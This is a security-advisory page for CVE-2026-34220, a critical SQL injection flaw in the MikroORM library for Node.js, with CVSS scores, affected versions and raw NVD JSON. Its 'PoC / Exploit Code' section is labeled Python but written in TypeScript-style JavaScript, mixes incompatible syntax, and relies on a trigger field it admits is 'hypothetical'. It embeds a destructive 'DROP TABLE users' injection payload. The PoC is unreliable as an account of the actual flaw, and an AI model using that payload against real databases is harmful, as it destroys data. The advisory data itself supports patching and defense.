Security Vulnerability Report
中文
CVE-2026-34220 CVSS 9.8 CRITICAL

CVE-2026-34220

Published: 2026-03-31 16:16:32
Last Modified: 2026-04-03 15:16:45
Source: [email protected]

Description

MikroORM is a TypeScript ORM for Node.js based on Data Mapper, Unit of Work and Identity Map patterns. Prior to versions 6.6.10 and 7.0.6, there is a SQL injection vulnerability when specially crafted objects are interpreted as raw SQL query fragments. This issue has been patched in versions 6.6.10 and 7.0.6.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mikro-orm:mikroorm:*:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:mikro-orm:mikroorm:*:*:*:*:*:node.js:*:* - VULNERABLE
MikroORM < 6.6.10
MikroORM < 7.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// Vulnerable concept for CVE-2026-34220 // This demonstrates how a crafted object might be interpreted as raw SQL const { MikroORM } = require('@mikro-orm/core'); const { Entity, PrimaryKey, Property } = require('@mikro-orm/core'); @Entity() class User { @PrimaryKey() id!: number; @Property() name!: string; } async function main() { const orm = await MikroORM.init({ entities: [User], dbName: 'test_db', type: 'postgresql', // Example database type }); const em = orm.em.fork(); // In vulnerable versions, an object like this might be treated as a raw SQL fragment // instead of a safe parameter, leading to SQL Injection. const maliciousInput = { // Hypothetical internal structure that triggers the vulnerability __raw: "1=1; DROP TABLE users; --" }; try { // If the ORM interprets 'maliciousInput' as raw SQL: // SELECT * FROM users WHERE 1=1; DROP TABLE users; -- const users = await em.find(User, maliciousInput); console.log('Exploit successful:', users); } catch (e) { console.error('Error:', e); } finally { await orm.close(); } } main();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34220", "sourceIdentifier": "[email protected]", "published": "2026-03-31T16:16:32.127", "lastModified": "2026-04-03T15:16:45.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MikroORM is a TypeScript ORM for Node.js based on Data Mapper, Unit of Work and Identity Map patterns. Prior to versions 6.6.10 and 7.0.6, there is a SQL injection vulnerability when specially crafted objects are interpreted as raw SQL query fragments. This issue has been patched in versions 6.6.10 and 7.0.6."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mikro-orm:mikroorm:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "6.6.10", "matchCriteriaId": "0FEF8C0C-0A0A-4580-B601-D588C9E81FB2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mikro-orm:mikroorm:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.6", "matchCriteriaId": "BC38F0C3-2043-4A5D-9FFF-CA1F7E295BD3"}]}]}], "references": [{"url": "https://github.com/mikro-orm/mikro-orm/security/advisories/GHSA-gwhv-j974-6fxm", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.